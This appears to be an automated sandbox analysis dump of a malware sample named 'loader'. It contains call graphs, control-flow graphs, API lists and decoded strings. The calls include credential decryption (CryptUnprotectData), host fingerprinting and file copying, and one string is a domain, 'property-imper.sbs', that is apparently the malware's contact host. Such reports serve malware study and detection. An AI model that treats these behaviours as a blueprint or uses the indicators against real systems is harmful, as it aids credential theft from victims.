10296->10366 10374 442220 10296->10374 10297->10296 10300->10296 10302 428bd0 10301->10302 10305 428c4e 10302->10305 10386 43e990 LdrInitializeThunk 10302->10386 10303 40e355 10309 428f50 10303->10309 10305->10303 10308 428d5e 10305->10308 10387 43e990 LdrInitializeThunk 10305->10387 10306 43bf80 RtlFreeHeap 10306->10303 10308->10306 10388 428f70 10309->10388 10329->10257 10330->10259 10339 421fe0 10338->10339 10339->10339 10340 4220dc 10339->10340 10341 441240 LdrInitializeThunk 10339->10341 10342 4220ff 10339->10342 10340->10278 10341->10342 10342->10340 10343 4240d0 2 API calls 10342->10343 10343->10340 10345 441c40 10344->10345 10349 441c9e 10345->10349 10352 43e990 LdrInitializeThunk 10345->10352 10346 441f04 10346->10277 10348 43bf80 RtlFreeHeap 10348->10346 10349->10346 10351 441d5e 10349->10351 10353 43e990 LdrInitializeThunk 10349->10353 10351->10348 10351->10351 10352->10349 10353->10351 10356 441810 10354->10356 10355 4418ef 10355->10285 10356->10355 10358 43e990 LdrInitializeThunk 10356->10358 10358->10355 10360 43e90b 10359->10360 10361 43e919 RtlReAllocateHeap 10359->10361 10362 43e969 10359->10362 10363 43e95e 10359->10363 10360->10361 10360->10362 10361->10363 10364 43bf80 RtlFreeHeap 10362->10364 10363->10296 10364->10363 10367 441940 10366->10367 10369 44199e 10367->10369 10382 43e990 LdrInitializeThunk 10367->10382 10371 441bac 10369->10371 10373 441ac3 10369->10373 10383 43e990 LdrInitializeThunk 10369->10383 10370 43bf80 RtlFreeHeap 10370->10371 10371->10296 10373->10370 10375 442231 10374->10375 10377 4422ee 10375->10377 10384 43e990 LdrInitializeThunk 10375->10384 10379 44254e 10377->10379 10381 44248f 10377->10381 10385 43e990 LdrInitializeThunk 10377->10385 10378 43bf80 RtlFreeHeap 10378->10379 10379->10296 10381->10378 10382->10369 10383->10373 10384->10377 10385->10381 10386->10305 10387->10308 10389 428fd0 10388->10389 10389->10389 10392 43bfe0 10389->10392 10393 43c010 10392->10393 10396 43c04e 10393->10396 10400 43e990 LdrInitializeThunk 10393->10400 10394 42903c 10396->10394 10399 43c12e 10396->10399 10401 43e990 LdrInitializeThunk 10396->10401 10397 43bf80 RtlFreeHeap 10397->10394 10399->10397 10400->10396 10401->10399 10720 41af7a 10721 41afa0 10720->10721 10723 41b54b 10721->10723 10730 43e990 LdrInitializeThunk 10721->10730 10725 41b6c3 10723->10725 10731 43e990 LdrInitializeThunk 10723->10731 10728 41b773 10725->10728 10732 43e990 LdrInitializeThunk 10725->10732 10726 41b823 10728->10726 10733 43e990 LdrInitializeThunk 10728->10733 10730->10723 10731->10725 10732->10728 10733->10726 10530 41a801 10531 41a800 10530->10531 10531->10530 10534 41a80e 10531->10534 10536 43e990 LdrInitializeThunk 10531->10536 10533 41a8be 10533->10533 10534->10533 10537 43e990 LdrInitializeThunk 10534->10537 10536->10534 10537->10533 10538 40bc00 10539 40bc90 10538->10539 10539->10539 10540 40bcc6 10539->10540 10541 43e8f0 RtlFreeHeap RtlReAllocateHeap 10539->10541 10541->10539 10542 40ae00 10543 40ae15 10542->10543 10546 40b6e0 10543->10546 10548 40b720 10546->10548 10547 40ae35 10548->10547 10548->10548 10549 43bf80 RtlFreeHeap 10548->10549 10549->10547 10734 41a900 10736 41a8f0 10734->10736 10735 43bfe0 2 API calls 10735->10736 10736->10734 10736->10735 10738 43e990 LdrInitializeThunk 10736->10738 10738->10736 10902 42d780 CreateDIBSection SelectObject 10903 42d7f3 DeleteObject 10902->10903 10904 42d7fa 10902->10904 10903->10904 10094 439600 10097 439628 10094->10097 10095 4398b7 10099 4396ce 10097->10099 10103 43e990 LdrInitializeThunk 10097->10103 10099->10095 10101 4397b0 10099->10101 10102 43e990 LdrInitializeThunk 10099->10102 10101->10095 10104 43e990 LdrInitializeThunk 10101->10104 10102->10099 10103->10097 10104->10101 10105 41a205 10106 41a210 10105->10106 10107 41a3c5 CryptUnprotectData 10106->10107 10108 41a3ef 10107->10108 10108->10108 10905 423189 10906 441400 LdrInitializeThunk 10905->10906 10907 4231a6 10906->10907 10908 429d8c 10909 429da3 10908->10909 10910 441090 LdrInitializeThunk 10909->10910 10911 429dc5 10910->10911 10912 441400 LdrInitializeThunk 10911->10912 10912->10911 10630 42a892 10631 441090 LdrInitializeThunk 10630->10631 10632 42a8a2 10631->10632 10633 441090 LdrInitializeThunk 10632->10633 10634 42a8c0 10633->10634 10635 42a692 10636 42a672 10635->10636 10638 42a3cf 10635->10638 10637 441400 LdrInitializeThunk 10637->10638 10638->10636 10638->10637 10639 4414e0 LdrInitializeThunk 10638->10639 10639->10638 10163 423c90 10164 423ca4 10163->10164 10167 423db5 10163->10167 10169 423de0 10164->10169 10166 423d8c 10166->10167 10168 422220 RtlFreeHeap LdrInitializeThunk 10166->10168 10168->10167 10170 423df0 10169->10170 10170->10170 10173 441240 10170->10173 10172 423eff 10174 441260 10173->10174 10174->10174 10175 4413ae 10174->10175 10177 43e990 LdrInitializeThunk 10174->10177 10175->10172 10177->10175 10178 40d493 CoInitializeSecurity 10921 41cf97 10922 41cf9f 10921->10922 10923 43c3a0 LdrInitializeThunk 10922->10923 10924 41cfa8 10923->10924 10550 42c21b 10551 42c2a2 10550->10551 10553 42c5e2 10550->10553 10557 42c293 10550->10557 10559 42c22b 10550->10559 10552 42c61e 10555 441400 LdrInitializeThunk 10552->10555 10554 441400 LdrInitializeThunk 10553->10554 10554->10552 10556 42c631 10555->10556 10557->10551 10557->10552 10557->10553 10558 4414e0 LdrInitializeThunk 10557->10558 10560 42c522 10557->10560 10558->10557 10559->10551 10559->10552 10559->10553 10559->10557 10559->10560 10561 441090 LdrInitializeThunk 10559->10561 10560->10551 10563 43e990 LdrInitializeThunk 10560->10563 10561->10557 10563->10551 10749 42531f 10751 425337 10749->10751 10752 4253f7 10749->10752 10755 425662 10749->10755 10750 4256b0 10751->10752 10751->10755 10756 425cef 10751->10756 10761 43e990 LdrInitializeThunk 10751->10761 10753 425a01 10753->10752 10763 43e990 LdrInitializeThunk 10753->10763 10755->10750 10755->10753 10762 43e990 LdrInitializeThunk 10755->10762 10764 43e990 LdrInitializeThunk 10756->10764 10758 425d0e 10761->10751 10762->10755 10763->10753 10764->10758 10568 42e61d 10569 42e70c 10568->10569 10570 42e71c GetComputerNameExA 10569->10570 10572 42e770 GetComputerNameExA 10570->10572 10573 42e8a0 10572->10573 10925 422da0 10927 422dd6 10925->10927 10926 422e2f 10927->10926 10929 43e990 LdrInitializeThunk 10927->10929 10929->10927 10193 42e624 10195 42e643 10193->10195 10194 42e6fb FreeLibrary 10196 42e70c 10194->10196 10195->10194 10195->10195 10197 42e71c GetComputerNameExA 10196->10197 10199 42e770 GetComputerNameExA 10197->10199 10200 42e8a0 10199->10200 10574 40b428 10575 43bf80 RtlFreeHeap 10574->10575 10576 40b439 10575->10576 10237 40ddad 10239 40de50 10237->10239 10238 40deae 10239->10238 10241 43e990 LdrInitializeThunk 10239->10241 10241->10238 10577 41ba2f 10578 41ba34 10577->10578 10579 43c3a0 LdrInitializeThunk 10578->10579 10580 41cfa8 10579->10580 10580->10580 10652 4190b0 10653 43bfe0 2 API calls 10652->10653 10654 4190d8 10653->10654 10655 424cb0 10656 424cc4 10655->10656 10664 424fc8 10655->10664 10657 441090 LdrInitializeThunk 10656->10657 10656->10664 10658 424e11 10657->10658 10662 424f58 10658->10662 10667 439ed0 10658->10667 10661 441090 LdrInitializeThunk 10661->10662 10663 4414e0 LdrInitializeThunk 10662->10663 10662->10664 10665 424f88 10663->10665 10665->10664 10681 43e990 LdrInitializeThunk 10665->10681 10668 441090 LdrInitializeThunk 10667->10668 10676 439ef8 10668->10676 10669 439fc2 10672 43bf80 RtlFreeHeap 10669->10672 10670 43a3e7 10671 43c3a0 LdrInitializeThunk 10678 439f7e 10671->10678 10677 439fc8 10672->10677 10673 424f35 10673->10661 10673->10662 10674 43c440 LdrInitializeThunk 10674->10678 10675 43c240 LdrInitializeThunk 10675->10678 10676->10669 10676->10673 10676->10678 10682 43e990 LdrInitializeThunk 10676->10682 10677->10673 10683 43e990 LdrInitializeThunk 10677->10683 10678->10669 10678->10670 10678->10671 10678->10674 10678->10675 10681->10664 10682->10678 10683->10673 10765 423f30 SHEmptyRecycleBinW 10930 423fb1 10931 42401a 10930->10931 10932 4240d0 2 API calls 10931->10932 10933 424032 10932->10933 10684 426ab4 10685 441f20 2 API calls 10684->10685 10686 426ab0 10685->10686 10686->10684 10939 423fba 10940 423fe0 10939->10940 10940->10940 10941 4240d0 2 API calls 10940->10941 10942 424014 10941->10942 10943 4240d0 2 API calls 10942->10943 10944 424032 10943->10944 10945 42a7bc 10946 42a850 10945->10946 10946->10946 10947 42a87a CopyFileW 10946->10947 10581 42ae3d 10583 42ac60 10581->10583 10582 42ac3c 10583->10582 10584 441090 LdrInitializeThunk 10583->10584 10585 42ae1d 10584->10585 10585->10582 10586 441400 LdrInitializeThunk 10585->10586 10586->10585

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 439920-439978 1 439980-439994 0->1 1->1 2 439996-4399b2 1->2 4 4399b4 2->4 5 4399bf-439a0d CoCreateInstance 2->5 4->5 6 439a13-439a4f 5->6 7 439dea-439e13 call 4405d0 GetVolumeInformationW 5->7 8 439a50-439a6f 6->8 12 439e15-439e19 7->12 13 439e1d-439e1f 7->13 8->8 10 439a71-439a9c SysAllocString 8->10 18 439aa2-439abc CoSetProxyBlanket 10->18 19 439dd9-439de6 SysFreeString 10->19 12->13 14 439e3d-439e44 13->14 16 439e46-439e4d 14->16 17 439e5d-439e9d call 420ed0 14->17 16->17 20 439e4f-439e5b 16->20 26 439ea0-439ea8 17->26 22 439ac2-439ae1 18->22 23 439dcf-439dd5 18->23 19->7 20->17 25 439af0-439b0a 22->25 23->19 25->25 27 439b0c-439b93 SysAllocString 25->27 26->26 28 439eaa-439eac 26->28 29 439ba0-439bc2 27->29 30 439e30-439e37 28->30 31 439eae-439ebe call 408c60 28->31 29->29 32 439bc4-439bed SysAllocString 29->32 30->14 33 439ec3-439eca 30->33 31->30 37 439bf3-439c15 32->37 38 439db6-439dc8 SysFreeString * 2 32->38 40 439c1b-439c1e 37->40 41 439dac-439db2 37->41 38->23 40->41 42 439c24-439c29 40->42 41->38 42->41 43 439c2f-439c84 VariantInit 42->43 44 439c90-439cb2 43->44 44->44 45 439cb4-439cca 44->45 46 439cce-439cd0 45->46 47 439cd6-439cdc 46->47 48 439d9b-439da8 VariantClear 46->48 47->48 49 439ce2-439cf0 47->49 48->41 50 439cf2-439cf7 49->50 51 439d2d 49->51 53 439d0c-439d10 50->53 52 439d2f-439d5e call 408ad0 call 409a50 51->52 64 439d60 52->64 65 439d65-439d6d 52->65 54 439d12-439d1b 53->54 55 439d00 53->55 58 439d22-439d26 54->58 59 439d1d-439d20 54->59 57 439d01-439d0a 55->57 57->52 57->53 58->57 61 439d28-439d2b 58->61 59->57 61->57 64->65 66 439d74-439d97 call 408b00 call 408ae0 65->66 67 439d6f 65->67 66->48 67->66
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00444678,00000000,00000001,00444668,00000000), ref: 00439A05
                                                                                      • SysAllocString.OLEAUT32(3F8D398E), ref: 00439A76
                                                                                      • CoSetProxyBlanket.COMBASE(33EF7DB6,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439AB4
                                                                                      • SysAllocString.OLEAUT32(F3A3F1AF), ref: 00439B11
                                                                                      • SysAllocString.OLEAUT32(03470153), ref: 00439BC9
                                                                                      • VariantInit.OLEAUT32(?), ref: 00439C34
                                                                                      • VariantClear.OLEAUT32(?), ref: 00439D9C
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00439DC0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00439DC6
                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00439DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                      • String ID: ,-$01$C$\$c-}/$j)c+$m%g+
                                                                                      • API String ID: 2485776651-398313838
                                                                                      • Opcode ID: 450ad9697d594b8ae526726a255cd1b75d5532c9885b9d68115b1d910846adac
                                                                                      • Instruction ID: 6783fb664f9c7609d2ca224fa02c8d62be5b75272fe718f4842a1c20fd6db3b4
                                                                                      • Opcode Fuzzy Hash: 450ad9697d594b8ae526726a255cd1b75d5532c9885b9d68115b1d910846adac
                                                                                      • Instruction Fuzzy Hash: 3EE1ECB0608300ABE710CF60DC86B5BBBE9EF89714F14892DF6958B391D7B9C805CB56

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 210 42e624-42e683 call 4405d0 214 42e690-42e6b5 210->214 214->214 215 42e6b7-42e6c2 214->215 216 42e6c4-42e6ca 215->216 217 42e6db-42e6e7 215->217 218 42e6d0-42e6d9 216->218 219 42e6fb-42e768 FreeLibrary call 4405d0 GetComputerNameExA 217->219 220 42e6e9-42e6ef 217->220 218->217 218->218 225 42e770-42e7e8 219->225 221 42e6f0-42e6f9 220->221 221->219 221->221 225->225 226 42e7ea-42e7f3 225->226 227 42e7f5-42e7ff 226->227 228 42e80d 226->228 229 42e800-42e809 227->229 230 42e80f-42e81b 228->230 229->229 231 42e80b 229->231 232 42e83b-42e898 GetComputerNameExA 230->232 233 42e81d-42e823 230->233 231->230 235 42e8a0-42e8f9 232->235 234 42e830-42e839 233->234 234->232 234->234 235->235 236 42e8fb-42e904 235->236 237 42e906-42e90f 236->237 238 42e91d 236->238 239 42e910-42e919 237->239 240 42e91f-42e92b 238->240 239->239 241 42e91b 239->241 242 42e94b-42e9a4 240->242 243 42e92d-42e933 240->243 241->240 246 42e9b0-42e9dc 242->246 244 42e940-42e949 243->244 244->242 244->244 246->246 247 42e9de-42e9e7 246->247 248 42e9e9-42e9f7 247->248 249 42ea0d-42ea0f 247->249 250 42ea00-42ea09 248->250 251 42ea15-42ea21 249->251 250->250 252 42ea0b 250->252 253 42ea23-42ea29 251->253 254 42ea3b-42eaa7 call 4405d0 251->254 252->251 255 42ea30-42ea39 253->255 259 42eab0-42ead0 254->259 255->254 255->255 259->259 260 42ead2-42eadb 259->260 261 42eafd 260->261 262 42eadd-42eae5 260->262 264 42eaff-42eb10 261->264 263 42eaf0-42eaf9 262->263 263->263 265 42eafb 263->265 266 42eb16-42eb1f 264->266 267 42ec64-42eca5 264->267 265->264 268 42eb20-42eb33 266->268 269 42ecb0-42ed10 267->269 270 42eb40-42eb46 268->270 271 42eb35-42eb3d 268->271 269->269 272 42ed12-42ed20 269->272 274 42eb90-42eb9c 270->274 275 42eb48-42eb4b 270->275 273 42eb65-42eb67 271->273 276 42ed22-42ed28 272->276 277 42ed3b-42ed3e call 432d70 272->277 282 42eb6a-42eb6c 273->282 279 42ebf9-42ec01 274->279 280 42eb9e-42eba1 274->280 275->274 281 42eb4d-42eb62 275->281 283 42ed30-42ed39 276->283 285 42ed43-42ed62 277->285 287 42ec03-42ec09 279->287 288 42ec0e-42ec14 279->288 280->279 286 42eba3-42ebf4 280->286 281->273 284 42eb6e-42eb77 282->284 283->277 283->283 284->267 289 42eb7d-42eb7f 284->289 286->282 287->284 290 42ec16-42ec55 288->290 291 42ec5a-42ec5f 288->291 289->268 292 42eb81 289->292 290->282 291->282 292->267
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042E706
                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042E73D
                                                                                      • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042E85B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ComputerName$FreeLibrary
                                                                                      • String ID: IVW!$JdRr$M[Qb
                                                                                      • API String ID: 2243422189-235605628
                                                                                      • Opcode ID: eba18d89598685c1644385ce80c66e9b665dfc67401a873695caef8bccd1a490
                                                                                      • Instruction ID: a99b1aee0251b4636e8145d5897e43cbcd6f14e236245c6a8f4b5d9e1823f2d6
                                                                                      • Opcode Fuzzy Hash: eba18d89598685c1644385ce80c66e9b665dfc67401a873695caef8bccd1a490
                                                                                      • Instruction Fuzzy Hash: 60F10871604B918EE725CF36C4517A3BBD2AF93304F5888AEC0EB8B392D67D6506CB15

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 293 409350-409361 call 43d380 296 409367-40937f SHGetSpecialFolderPathW call 436ae0 293->296 297 40962d-40962f ExitProcess 293->297 300 409385-4093ad GetCurrentThreadId GetCurrentProcessId 296->300 301 409628 call 43e8d0 296->301 302 4093b1-40951a GetForegroundWindow 300->302 303 4093af 300->303 301->297 305 409520-40958f 302->305 306 409604-40961c call 40a990 302->306 303->302 307 409591-409593 305->307 308 409595-409602 305->308 306->301 311 40961e call 40d460 306->311 307->308 308->306 313 409623 call 40c2d0 311->313 313->301
                                                                                      APIs
                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00409372
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00409385
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040938D
                                                                                      • GetForegroundWindow.USER32 ref: 00409512
                                                                                      • ExitProcess.KERNEL32 ref: 0040962F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                      • String ID: u~{Y
                                                                                      • API String ID: 4063528623-4256596869
                                                                                      • Opcode ID: 73a09cb4516c67609a032676e4126725b2166837b14bf46d496d9d4efafca029
                                                                                      • Instruction ID: f3d6617cda9f479a547a10d95898704a407f799bb7dc0fb294d6f46aa9075601
                                                                                      • Opcode Fuzzy Hash: 73a09cb4516c67609a032676e4126725b2166837b14bf46d496d9d4efafca029
                                                                                      • Instruction Fuzzy Hash: 64711872B487045FC718EFADCC9235AB6D2ABC8314F0A853DB995DB391E978DC048685

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 315 4345c0-4346ac GetSystemMetrics * 2 321 4346b3-4349bc 315->321
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem
                                                                                      • String ID: $!PC$DQC$lPC
                                                                                      • API String ID: 4116985748-2418968371
                                                                                      • Opcode ID: e1d7e8f606b4943643813b412d82824a04204b7340d03281af6bf1324a2cdfb4
                                                                                      • Instruction ID: 11cd300eeb3c4e267d2820f3d249988e8f719e21e352e54e2f2c23f38b61a5d9
                                                                                      • Opcode Fuzzy Hash: e1d7e8f606b4943643813b412d82824a04204b7340d03281af6bf1324a2cdfb4
                                                                                      • Instruction Fuzzy Hash: 6D914FB45093818FE770DF24D58978BBBF0BB85348F10891EE5988B350DBB99948DF4A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 324 42e61d-42e717 call 4405d0 327 42e71c-42e768 GetComputerNameExA 324->327 328 42e770-42e7e8 327->328 328->328 329 42e7ea-42e7f3 328->329 330 42e7f5-42e7ff 329->330 331 42e80d 329->331 332 42e800-42e809 330->332 333 42e80f-42e81b 331->333 332->332 334 42e80b 332->334 335 42e83b-42e898 GetComputerNameExA 333->335 336 42e81d-42e823 333->336 334->333 338 42e8a0-42e8f9 335->338 337 42e830-42e839 336->337 337->335 337->337 338->338 339 42e8fb-42e904 338->339 340 42e906-42e90f 339->340 341 42e91d 339->341 342 42e910-42e919 340->342 343 42e91f-42e92b 341->343 342->342 344 42e91b 342->344 345 42e94b-42e9a4 343->345 346 42e92d-42e933 343->346 344->343 349 42e9b0-42e9dc 345->349 347 42e940-42e949 346->347 347->345 347->347 349->349 350 42e9de-42e9e7 349->350 351 42e9e9-42e9f7 350->351 352 42ea0d-42ea0f 350->352 353 42ea00-42ea09 351->353 354 42ea15-42ea21 352->354 353->353 355 42ea0b 353->355 356 42ea23-42ea29 354->356 357 42ea3b-42eaa7 call 4405d0 354->357 355->354 358 42ea30-42ea39 356->358 362 42eab0-42ead0 357->362 358->357 358->358 362->362 363 42ead2-42eadb 362->363 364 42eafd 363->364 365 42eadd-42eae5 363->365 367 42eaff-42eb10 364->367 366 42eaf0-42eaf9 365->366 366->366 368 42eafb 366->368 369 42eb16-42eb1f 367->369 370 42ec64-42eca5 367->370 368->367 371 42eb20-42eb33 369->371 372 42ecb0-42ed10 370->372 373 42eb40-42eb46 371->373 374 42eb35-42eb3d 371->374 372->372 375 42ed12-42ed20 372->375 377 42eb90-42eb9c 373->377 378 42eb48-42eb4b 373->378 376 42eb65-42eb67 374->376 379 42ed22-42ed28 375->379 380 42ed3b-42ed3e call 432d70 375->380 385 42eb6a-42eb6c 376->385 382 42ebf9-42ec01 377->382 383 42eb9e-42eba1 377->383 378->377 384 42eb4d-42eb62 378->384 386 42ed30-42ed39 379->386 388 42ed43-42ed62 380->388 390 42ec03-42ec09 382->390 391 42ec0e-42ec14 382->391 383->382 389 42eba3-42ebf4 383->389 384->376 387 42eb6e-42eb77 385->387 386->380 386->386 387->370 392 42eb7d-42eb7f 387->392 389->385 390->387 393 42ec16-42ec55 391->393 394 42ec5a-42ec5f 391->394 392->371 395 42eb81 392->395 393->385 394->385 395->370
                                                                                      APIs
                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042E73D
                                                                                      • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042E85B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ComputerName
                                                                                      • String ID: IVW!$JdRr$M[Qb
                                                                                      • API String ID: 3545744682-235605628
                                                                                      • Opcode ID: ca73a12de3c39c41fa0a5610a4b5b0dd015cdabfb8a47d247238ae51a56d5da7
                                                                                      • Instruction ID: c7e92e66253a795d86e791a733cbada10d1426f86a260d949d0f50c349d3ab56
                                                                                      • Opcode Fuzzy Hash: ca73a12de3c39c41fa0a5610a4b5b0dd015cdabfb8a47d247238ae51a56d5da7
                                                                                      • Instruction Fuzzy Hash: D202E371704B418FE725CF36C4517A3BBE2AF96304F18896EC0EA8B382D679A506CB55

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 425 40e3ca-40e403 call 4345c0 call 40a440 CoUninitialize 430 40e410-40e42e 425->430 430->430 431 40e430-40e45b 430->431 432 40e460-40e4ad 431->432 432->432 433 40e4af-40e517 432->433 434 40e520-40e568 433->434 434->434 435 40e56a-40e57b 434->435 436 40e59b-40e5a3 435->436 437 40e57d-40e58b 435->437 438 40e5a5-40e5aa 436->438 439 40e5bd 436->439 440 40e590-40e599 437->440 441 40e5b0-40e5b9 438->441 442 40e5c1-40e5ce 439->442 440->436 440->440 441->441 443 40e5bb 441->443 444 40e5d0-40e5d7 442->444 445 40e5eb-40e5f3 442->445 443->442 446 40e5e0-40e5e9 444->446 447 40e5f5-40e5f6 445->447 448 40e60b-40e615 445->448 446->445 446->446 449 40e600-40e609 447->449 450 40e617-40e61b 448->450 451 40e62b-40e637 448->451 449->448 449->449 452 40e620-40e629 450->452 453 40e651-40e786 451->453 454 40e639-40e63b 451->454 452->451 452->452 455 40e790-40e7e2 453->455 456 40e640-40e64d 454->456 455->455 458 40e7e4-40e80f 455->458 456->456 457 40e64f 456->457 457->453 459 40e810-40e855 458->459 459->459 460 40e857-40e8b3 call 40c300 459->460
                                                                                      APIs
                                                                                        • Part of subcall function 004345C0: GetSystemMetrics.USER32 ref: 00434609
                                                                                        • Part of subcall function 004345C0: GetSystemMetrics.USER32 ref: 00434619
                                                                                      • CoUninitialize.COMBASE ref: 0040E3DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$Uninitialize
                                                                                      • String ID: G!y$WXOL$XY$property-imper.sbs
                                                                                      • API String ID: 1128523136-4096150396
                                                                                      • Opcode ID: 93cfa104a32890a23d95f4976a3fe292aa2339b280cb487f8514a0e963ccd44c
                                                                                      • Instruction ID: 2d3a2857ca172e7d4994597b9bd5e38e182190ab1a2ea50c212f3d1833e48c38
                                                                                      • Opcode Fuzzy Hash: 93cfa104a32890a23d95f4976a3fe292aa2339b280cb487f8514a0e963ccd44c
                                                                                      • Instruction Fuzzy Hash: C3C1E1711093828BD335CF2995507DBBBE1AFE2304F184D6DD4C99B342D7798509CB96

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 463 40a440-40a44e 464 40a933 463->464 465 40a454-40a4c9 call 4067d0 call 408ad0 463->465 466 40a935-40a941 464->466 471 40a4d0-40a509 465->471 471->471 472 40a50b-40a52f call 409c50 471->472 475 40a530-40a568 472->475 475->475 476 40a56a-40a59f call 409c50 475->476 479 40a5a0-40a5bc 476->479 479->479 480 40a5be-40a60f call 409c50 479->480 483 40a610-40a63e 480->483 483->483 484 40a640-40a65f 483->484 485 40a660-40a679 484->485 485->485 486 40a67b-40a6b8 call 409c50 485->486 489 40a6c0-40a715 486->489 489->489 490 40a717-40a7f9 call 409f60 489->490 493 40a800-40a847 490->493 493->493 494 40a849-40a851 493->494 495 40a871-40a87c 494->495 496 40a853-40a85b 494->496 498 40a8a1-40a8db 495->498 499 40a87e-40a881 495->499 497 40a860-40a86f 496->497 497->495 497->497 500 40a8e0-40a8f4 498->500 501 40a890-40a89f 499->501 500->500 502 40a8f6-40a90b call 40cd00 500->502 501->498 501->501 504 40a910-40a931 call 408ae0 502->504 504->466
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ($16DE138718E3EA5C00A820AA85D26A7C$Fx~F$Fx~F$d
                                                                                      • API String ID: 0-2675516244
                                                                                      • Opcode ID: 5a20a72eebe6b88a9bf2ec2fcd198b001561c775ed2ba78ffb24342cb91cc046
                                                                                      • Instruction ID: d73f41b341dda446e074a8002f32f95ffe5a2599297133f20ee3a583cc229af9
                                                                                      • Opcode Fuzzy Hash: 5a20a72eebe6b88a9bf2ec2fcd198b001561c775ed2ba78ffb24342cb91cc046
                                                                                      • Instruction Fuzzy Hash: 80D1F1716087408BE718CF25D85176BBBE5EFD1308F18892DE5D59B292DA3CC80ACB97
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 46594d1fb7e87d12aedcaf322bddfd0c1c535fdb6c2e077933be3bb4825fa584
                                                                                      • Instruction ID: 049f3cb8f173ff365444af70717aae1bc6a2e7232062e0934f449d728ee97af8
                                                                                      • Opcode Fuzzy Hash: 46594d1fb7e87d12aedcaf322bddfd0c1c535fdb6c2e077933be3bb4825fa584
                                                                                      • Instruction Fuzzy Hash: 05D1CBB46083409FD310AF65E88262FBBF0FF92354F54492EF5858B351EBB88945CB5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /.-,
                                                                                      • API String ID: 0-4180950418
                                                                                      • Opcode ID: d655b1805acc7bec612192ef7d21b35e3bfb245058b9ef8769dc0fa6d1bb2b43
                                                                                      • Instruction ID: 3b8a72c8a70c1f2cdc7209a6036bd23aea64c503530aeccb4d5e8748021c8337
